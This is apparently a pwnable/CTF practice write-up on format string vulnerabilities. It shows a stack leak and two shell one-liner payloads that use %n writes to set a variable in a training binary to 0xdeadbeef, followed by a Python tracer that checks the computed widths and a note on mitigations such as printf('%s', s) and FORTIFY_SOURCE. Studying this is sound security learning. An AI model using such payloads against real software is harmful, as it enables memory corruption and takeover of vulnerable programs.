FSB TIPS
HACK/PWNABLE | 2019. 3. 24. 22:26
[0xbffffa98] -> [0xdeadbeef]
[input]
./fsb "`python -c 'print "AAAA" + " %08x"*9'`"
[output]
check at 0xbffffa98
argv[1] = [AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x]
fmt=[AAAA b7fdc4a0 00000001 00000000 00000001 bffffbd4 00000000 00000000 04030201 41414141]
check=0x4030201
[payload 1]
./fsb `python -c 'print "\x98\xfa\xff\xbf"+"AAAA"+"\x9a\xfa\xff\xbf"+"%08x"*7+"%48811c%n%8126c%n"'`
[payload 2]
./fsb `python -c 'print "\x98\xfa\xff\xbf\x9a\xfa\xff\xbf" + "%48871x%9$n%8126x%10$n"'`
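[added example]
This is an added example, not code from the original post: a tracer that walks a captured format string and reports which address each %n would store to and what value, so the 48811 / 48871 / 8126 widths in the two payloads can be checked. It assumes 32-bit little-endian arguments and that the buffer begins at printf argument 9, as the page's output shows; the names `trace_writes` and `u32_after` are made up for this example.

```python
import re
import struct

# One printf directive: optional "N$" position, flags, width, length, conversion.
DIRECTIVE = re.compile(rb"%(?:(\d+)\$)?[-+ #0]*(\d+)?(hh|h|ll|l)?([cdiuxXspn%])")
N_SIZE = {b"hh": 1, b"h": 2}              # bytes stored by %hhn / %hn; plain %n stores 4

def trace_writes(payload, buf_arg):
    """Return [(address, value, size)] for every %n-style store in payload.
    buf_arg is the 1-based argument index where the payload's bytes start
    (9 in the page's output: 41414141 is the ninth value printed)."""
    writes, count, next_arg, pos = [], 0, 1, 0
    for m in DIRECTIVE.finditer(payload):
        count += m.start() - pos          # literal bytes are printed unchanged
        pos = m.end()
        position, width, length, conv = m.groups()
        if conv == b"%":                  # "%%" prints one character, uses no argument
            count += 1
            continue
        arg = int(position) if position else next_arg
        if not position:
            next_arg += 1
        if conv != b"n":
            # Assumption: printed length equals the width, true for %c and for
            # %x of a 32-bit value when width >= 8 (covers both payloads here).
            if conv not in b"cxX" or (conv != b"c" and int(width or 0) < 8):
                raise ValueError("output length depends on stack contents")
            count += int(width or 1)
            continue
        off = (arg - buf_arg) * 4         # where in the payload this argument lives
        if off < 0 or off + 4 > len(payload):
            raise ValueError("pointer for %n is not taken from the payload")
        size = N_SIZE.get(length, 4)
        addr = struct.unpack_from("<I", payload, off)[0]
        writes.append((addr, count & ((1 << 8 * size) - 1), size))
    return writes

def u32_after(writes, addr):
    """Replay the stores in order on a sparse byte map and read 4 bytes at addr."""
    mem = {}
    for a, value, size in writes:
        mem.update((a + i, b) for i, b in enumerate(value.to_bytes(size, "little")))
    return int.from_bytes(bytes(mem.get(addr + i, 0) for i in range(4)), "little")

LO, HI = b"\x98\xfa\xff\xbf", b"\x9a\xfa\xff\xbf"     # addresses from the page
PAYLOAD_1 = LO + b"AAAA" + HI + b"%08x" * 7 + b"%48811c%n%8126c%n"
PAYLOAD_2 = LO + HI + b"%48871x%9$n%8126x%10$n"

print(hex(u32_after(trace_writes(PAYLOAD_2, 9), 0xBFFFFA98)))
```

Both payloads store 0xbeef at 0xbffffa98 and 0xdead at 0xbffffa9a, and because they use plain %n the second store also zeroes the two bytes at 0xbffffa9c. Passing the input as an argument (`printf("%s", s)`) removes the directives' effect, and glibc built with `-D_FORTIFY_SOURCE=2` aborts on %n in a writable format string.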